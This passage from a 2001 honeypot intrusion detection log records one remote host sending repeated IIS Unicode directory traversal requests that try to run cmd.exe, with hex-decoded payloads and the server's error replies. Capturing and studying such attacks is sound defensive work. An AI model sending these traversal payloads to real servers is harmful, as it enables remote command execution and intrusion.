-> dport: 80 flags=******S* seq=483647421 ack=0 off=6 res=0 win=8192 urp=0 chksum=47761 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25532) [2001-09-18 10:21:36] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=35846 flags=0 offset=0 TTL=128 chksum=48528 TCP: port=80 -> dport: 3967 flags=***A**S* seq=549229 ack=483647422 off=6 res=0 win=8760 urp=0 chksum=22227 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25533) [2001-09-18 10:21:36] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=14449 flags=0 offset=0 TTL=118 chksum=23338 TCP: port=2735 -> dport: 80 flags=*****R** seq=478857824 ack=478857824 off=5 res=0 win=0 urp=0 chksum=9687 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25534) [2001-09-18 10:21:36] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=19057 flags=0 offset=0 TTL=119 chksum=2090 TCP: port=3967 -> dport: 80 flags=***A**** seq=483647422 ack=549230 off=5 res=0 win=8760 urp=0 chksum=28304 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25535) [2001-09-18 10:21:36] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=137 ID=19313 flags=0 offset=0 TTL=119 chksum=1737 TCP: port=3967 -> dport: 80 flags=***AP*** seq=483647422 ack=549230 off=5 res=0 win=8760 urp=0 chksum=5253 Payload: length = 91 000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/.. 010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../.. 020 : 25 35 63 2E 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 %5c../Admin.dll 030 : 6E 2E 64 6C 6C 20 48 54 54 50 2F 31 2E 30 0D 0A n.dll HTTP/1.0.. 040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: www..Connn 050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F ection: clo ---------------------------------------------------------------------------- -- #(2 - 25536) [2001-09-18 10:21:36] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=279 ID=36870 flags=0 offset=0 TTL=128 chksum=47269 TCP: port=80 -> dport: 3967 flags=***AP*** seq=549230 ack=483647519 off=5 res=0 win=8663 urp=0 chksum=13828 Payload: length = 239 000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser 010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve 020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS 030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue, 040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16: 050 : 30 35 3A 31 37 20 47 4D 54 0D 0A 43 6F 6E 74 65 05:17 GMT..Conte 060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht 070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng 080 : 74 68 3A 20 31 30 30 0D 0A 0D 0A 3C 68 74 6D 6C th: 100....<html 090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72 ><head><title>Er 0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 ror</title></hea 0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 73 70 65 63 d><body>The spec 0c0 : 69 66 69 65 64 20 6D 6F 64 75 6C 65 20 63 6F 75 ified module cou 0d0 : 6C 64 20 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E ld not be found. 0e0 : 20 3C 2F 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E </body></html> ---------------------------------------------------------------------------- -- #(2 - 25537) [2001-09-18 10:21:36] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=37126 flags=0 offset=0 TTL=128 chksum=47252 TCP: port=80 -> dport: 3967 flags=***A***F seq=549469 ack=483647519 off=5 res=0 win=8663 urp=0 chksum=28064 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25538) [2001-09-18 10:21:36] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=24945 flags=0 offset=0 TTL=118 chksum=61993 TCP: port=3967 -> dport: 80 flags=*****R** seq=483647519 ack=0 off=5 res=0 win=0 urp=0 chksum=61929 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25539) [2001-09-18 10:21:36] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=25201 flags=0 offset=0 TTL=118 chksum=61733 TCP: port=3978 -> dport: 80 flags=******S* seq=483647541 ack=0 off=6 res=0 win=8192 urp=0 chksum=47630 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25540) [2001-09-18 10:21:36] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=37894 flags=0 offset=0 TTL=128 chksum=46480 TCP: port=80 -> dport: 3978 flags=***A**S* seq=549530 ack=483647542 off=6 res=0 win=8760 urp=0 chksum=21795 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25541) [2001-09-18 10:21:36] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=28017 flags=0 offset=0 TTL=118 chksum=9770 TCP: port=3967 -> dport: 80 flags=*****R** seq=483647519 ack=483647519 off=5 res=0 win=0 urp=0 chksum=62710 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25542) [2001-09-18 10:21:37] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=35953 flags=0 offset=0 TTL=119 chksum=50729 TCP: port=3978 -> dport: 80 flags=***A**** seq=483647542 ack=549531 off=5 res=0 win=8760 urp=0 chksum=27872 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25543) [2001-09-18 10:21:37] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=157 ID=36209 flags=0 offset=0 TTL=119 chksum=50356 TCP: port=3978 -> dport: 80 flags=***AP*** seq=483647542 ack=549531 off=5 res=0 win=8760 urp=0 chksum=28493 Payload: length = 111 000 : 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/.. 010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../.. 020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst 030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1 050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C 060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo ---------------------------------------------------------------------------- -- #(2 - 25544) [2001-09-18 10:21:37] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=644 ID=38918 flags=0 offset=0 TTL=128 chksum=44856 TCP: port=80 -> dport: 3978 flags=***AP*** seq=549531 ack=483647659 off=5 res=0 win=8643 urp=0 chksum=8479 Payload: length = 604 000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj 010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S 020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft 030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date: 040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001 050 : 20 31 36 3A 30 35 3A 31 37 20 47 4D 54 0D 0A 43 16:05:17 GMT..C 060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4 070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type 080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....< 090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C html><head><titl 0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error 404</tit 0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta nam 0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots" conte 0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C nt="noindex">..< 0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV= 0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43 "Content-Type" C 100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D ONTENT="text/htm 110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8 120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A 859-1"></head>.. 130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E ..<body>....<h2> 140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</ 150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E h2>....<p><stron 160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not Found< 170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A /strong></p>.... 180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web serve 190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th 1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script 1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for. 1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the 1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t 1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is 1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A correct.</p>.... 200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please contac 210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a 220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if 230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per 240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F sists.</p>....</ 250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E body></html> ---------------------------------------------------------------------------- -- #(2 - 25545) [2001-09-18 10:21:37] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=39174 flags=0 offset=0 TTL=128 chksum=45204 TCP: port=80 -> dport: 3978 flags=***A***F seq=550135 ack=483647659 off=5 res=0 win=8643 urp=0 chksum=27267 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25546) [2001-09-18 10:21:37] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=47985 flags=0 offset=0 TTL=118 chksum=38953 TCP: port=3978 -> dport: 80 flags=*****R** seq=483647659 ack=0 off=5 res=0 win=0 urp=0 chksum=61778 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25547) [2001-09-18 10:21:37] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=48241 flags=0 offset=0 TTL=118 chksum=38693 TCP: port=4013 -> dport: 80 flags=******S* seq=483647897 ack=0 off=6 res=0 win=8192 urp=0 chksum=47239 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25548) [2001-09-18 10:21:37] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=40198 flags=0 offset=0 TTL=128 chksum=44176 TCP: port=80 -> dport: 4013 flags=***A**S* seq=550221 ack=483647898 off=6 res=0 win=8760 urp=0 chksum=20713 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25549) [2001-09-18 10:21:37] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=48497 flags=0 offset=0 TTL=118 chksum=54825 TCP: port=3978 -> dport: 80 flags=*****R** seq=483647659 ack=483647659 off=5 res=0 win=0 urp=0 chksum=62419 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25550) [2001-09-18 10:21:38] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=4722 flags=0 offset=0 TTL=119 chksum=16425 TCP: port=4013 -> dport: 80 flags=***A**** seq=483647898 ack=550222 off=5 res=0 win=8760 urp=0 chksum=26790 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25551) [2001-09-18 10:21:38] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=185 ID=4978 flags=0 offset=0 TTL=119 chksum=16024 TCP: port=4013 -> dport: 80 flags=***AP*** seq=483647898 ack=550222 off=5 res=0 win=8760 urp=0 chksum=3789 Payload: length = 127 000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c 010 : 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c 020 : 2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E /..55../..c1../. 030 : 2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ./.../winnt/syst 040 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 050 : 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F dir 32/cmd.exe?/ 060 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 070 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E Host: www..Conn ---------------------------------------------------------------------------- -- #(2 - 25552) [2001-09-18 10:21:38] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=305 ID=41734 flags=0 offset=0 TTL=128 chksum=42379 TCP: port=80 -> dport: 4013 flags=***AP*** seq=550222 ack=483648043 off=5 res=0 win=8615 urp=0 chksum=48807 Payload: length = 265 000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser 010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve 020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS 030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue, 040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16: 050 : 30 35 3A 31 38 20 47 4D 54 0D 0A 43 6F 6E 74 65 05:18 GMT..Conte 060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht 070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng 080 : 74 68 3A 20 31 32 36 0D 0A 0D 0A 3C 68 74 6D 6C th: 126....<html 090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72 ><head><title>Er 0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 ror</title></hea 0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 66 69 6C 65 d><body>The file 0c0 : 6E 61 6D 65 2C 20 64 69 72 65 63 74 6F 72 79 20 name, directory 0d0 : 6E 61 6D 65 2C 20 6F 72 20 76 6F 6C 75 6D 65 20 name, or volume 0e0 : 6C 61 62 65 6C 20 73 79 6E 74 61 78 20 69 73 20 label syntax is 0f0 : 69 6E 63 6F 72 72 65 63 74 2E 20 3C 2F 62 6F 64 incorrect. </bod 100 : 79 3E 3C 2F 68 74 6D 6C 3E y></html> ---------------------------------------------------------------------------- -- #(2 - 25553) [2001-09-18 10:21:38] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=41990 flags=0 offset=0 TTL=128 chksum=42388 TCP: port=80 -> dport: 4013 flags=***A***F seq=550487 ack=483648043 off=5 res=0 win=8615 urp=0 chksum=26524 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25554) [2001-09-18 10:21:38] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=61298 flags=0 offset=0 TTL=118 chksum=25640 TCP: port=4013 -> dport: 80 flags=*****R** seq=483648043 ack=2869794125 off=5 res=0 win=0 urp=0 chksum=44884 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25555) [2001-09-18 10:21:38] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=61554 flags=0 offset=0 TTL=118 chksum=25380 TCP: port=4030 -> dport: 80 flags=******S* seq=483648049 ack=0 off=6 res=0 win=8192 urp=0 chksum=47070 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25556) [2001-09-18 10:21:38] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=43270 flags=0 offset=0 TTL=128 chksum=41104 TCP: port=80 -> dport: 4030 flags=***A**S* seq=551192 ack=483648050 off=6 res=0 win=8760 urp=0 chksum=19573 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25557) [2001-09-18 10:21:38] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=61810 flags=0 offset=0 TTL=118 chksum=41512 TCP: port=4013 -> dport: 80 flags=*****R** seq=483648043 ack=483648043 off=5 res=0 win=0 urp=0 chksum=61616 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25558) [2001-09-18 10:21:38] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=7795 flags=0 offset=0 TTL=119 chksum=13352 TCP: port=4030 -> dport: 80 flags=***A**** seq=483648050 ack=551193 off=5 res=0 win=8760 urp=0 chksum=25650 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25559) [2001-09-18 10:21:38] WEB-IIS cmd.exe access IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=137 ID=8051 flags=0 offset=0 TTL=119 chksum=12999 TCP: port=4030 -> dport: 80 flags=***AP*** seq=483648050 ack=551193 off=5 res=0 win=8760 urp=0 chksum=42860 Payload: length = 91 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho 040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec 050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close ---------------------------------------------------------------------------- -- #(2 - 25560) [2001-09-18 10:21:38] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=305 ID=44550 flags=0 offset=0 TTL=128 chksum=39563 TCP: port=80 -> dport: 4030 flags=***AP*** seq=551193 ack=483648147 off=5 res=0 win=8663 urp=0 chksum=47411 Payload: length = 265 000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser 010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve 020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS 030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue, 040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16: 050 : 30 35 3A 31 39 20 47 4D 54 0D 0A 43 6F 6E 74 65 05:19 GMT..Conte 060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht 070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng 080 : 74 68 3A 20 31 32 36 0D 0A 0D 0A 3C 68 74 6D 6C th: 126....<html 090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72 ><head><title>Er 0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 ror</title></hea 0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 66 69 6C 65 d><body>The file 0c0 : 6E 61 6D 65 2C 20 64 69 72 65 63 74 6F 72 79 20 name, directory 0d0 : 6E 61 6D 65 2C 20 6F 72 20 76 6F 6C 75 6D 65 20 name, or volume 0e0 : 6C 61 62 65 6C 20 73 79 6E 74 61 78 20 69 73 20 label syntax is 0f0 : 69 6E 63 6F 72 72 65 63 74 2E 20 3C 2F 62 6F 64 incorrect. </bod 100 : 79 3E 3C 2F 68 74 6D 6C 3E y></html> ---------------------------------------------------------------------------- -- #(2 - 25561) [2001-09-18 10:21:38] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=44806 flags=0 offset=0 TTL=128 chksum=39572 TCP: port=80 -> dport: 4030 flags=***A***F seq=551458 ack=483648147 off=5 res=0 win=8663 urp=0 chksum=25384 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25562) [2001-09-18 10:21:39] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=17523 flags=0 offset=0 TTL=118 chksum=3880 TCP: port=4030 -> dport: 80 flags=*****R** seq=483648147 ack=0 off=5 res=0 win=0 urp=0 chksum=61238 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25563) [2001-09-18 10:21:39] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=44 ID=17779 flags=0 offset=0 TTL=118 chksum=3620 TCP: port=4070 -> dport: 80 flags=******S* seq=483904361 ack=0 off=6 res=0 win=8192 urp=0 chksum=52858 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25564) [2001-09-18 10:21:39] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=45574 flags=0 offset=0 TTL=128 chksum=38800 TCP: port=80 -> dport: 4070 flags=***A**S* seq=551823 ack=483904362 off=6 res=0 win=8760 urp=0 chksum=24730 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25565) [2001-09-18 10:21:39] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=18035 flags=0 offset=0 TTL=118 chksum=19752 TCP: port=4030 -> dport: 80 flags=*****R** seq=483648147 ack=483648147 off=5 res=0 win=0 urp=0 chksum=61391 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25566) [2001-09-18 10:21:39] Honeypot Data IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=40 ID=30067 flags=0 offset=0 TTL=119 chksum=56615 TCP: port=4070 -> dport: 80 flags=***A**** seq=483904362 ack=551824 off=5 res=0 win=8760 urp=0 chksum=30807 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25567) [2001-09-18 10:21:39] WEB-IIS cmd.exe access IPv4: 65.29.243.180 -> xx.xx.xx.xx hlen=5 TOS=0 dlen=137 ID=30323 flags=0 offset=0 TTL=119 chksum=56262 TCP: port=4070 -> dport: 80 flags=***AP*** seq=483904362 ack=551824 off=5 res=0 win=8760 urp=0 chksum=47249 Payload: length = 91 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/... 010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32 020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho 040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec 050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close ---------------------------------------------------------------------------- -- #(2 - 25568) [2001-09-18 10:21:39] Honeypot Data out IPv4: xx.xx.xx.xx -> 65.29.243.180 hlen=5 TOS=0 dlen=644 ID=46854 flags=0 offset=0 TTL=128 chksum=36920 TCP: port=80 -> dport: 4070 flags=***AP*** seq=551824 ack=483904459 off=5 res=0 win=8663 urp=0 chksum=13205 Payload: length = 604 000 : 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4F 62 6A HTTP/1.1 404 Obj 010 : 65 63 74 20 4E 6F 74 20 46 6F 75 6E 64 0D 0A 53 ect Not Found..S 020 : 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 erver: Microsoft 030 : 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 -IIS/4.0..Date: 040 : 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 30 31 Tue, 18 Sep 2001 050 : 20 31 36 3A 30 35 3A 32 30 20 47 4D 54 0D 0A 43 16:05:20 GMT..C 060 : 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 ontent-Length: 4 070 : 36 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 61..Content-Type 080 : 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C : text/html....< 090 : 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 74 69 74 6C html><head><titl 0a0 : 65 3E 45 72 72 6F 72 20 34 30 34 3C 2F 74 69 74 e>Error 404</tit 0b0 : 6C 65 3E 0D 0A 0D 0A 3C 6D 65 74 61 20 6E 61 6D le>....<meta nam 0c0 : 65 3D 22 72 6F 62 6F 74 73 22 20 63 6F 6E 74 65 e="robots" conte 0d0 : 6E 74 3D 22 6E 6F 69 6E 64 65 78 22 3E 0D 0A 3C nt="noindex">..< 0e0 : 4D 45 54 41 20 48 54 54 50 2D 45 51 55 49 56 3D META HTTP-EQUIV= 0f0 : 22 43 6F 6E 74 65 6E 74 2D 54 79 70 65 22 20 43 "Content-Type" C 100 : 4F 4E 54 45 4E 54 3D 22 74 65 78 74 2F 68 74 6D ONTENT="text/htm 110 : 6C 3B 20 63 68 61 72 73 65 74 3D 69 73 6F 2D 38 l; charset=iso-8 120 : 38 35 39 2D 31 22 3E 3C 2F 68 65 61 64 3E 0D 0A 859-1"></head>.. 130 : 0D 0A 3C 62 6F 64 79 3E 0D 0A 0D 0A 3C 68 32 3E ..<body>....<h2> 140 : 48 54 54 50 20 45 72 72 6F 72 20 34 30 34 3C 2F HTTP Error 404</ 150 : 68 32 3E 0D 0A 0D 0A 3C 70 3E 3C 73 74 72 6F 6E h2>....<p><stron 160 : 67 3E 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C g>404 Not Found< 170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A /strong></p>.... 180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web serve 190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th 1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script 1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for. 1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the 1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t 1e0 : 68 61 74 20 74 68 65 20 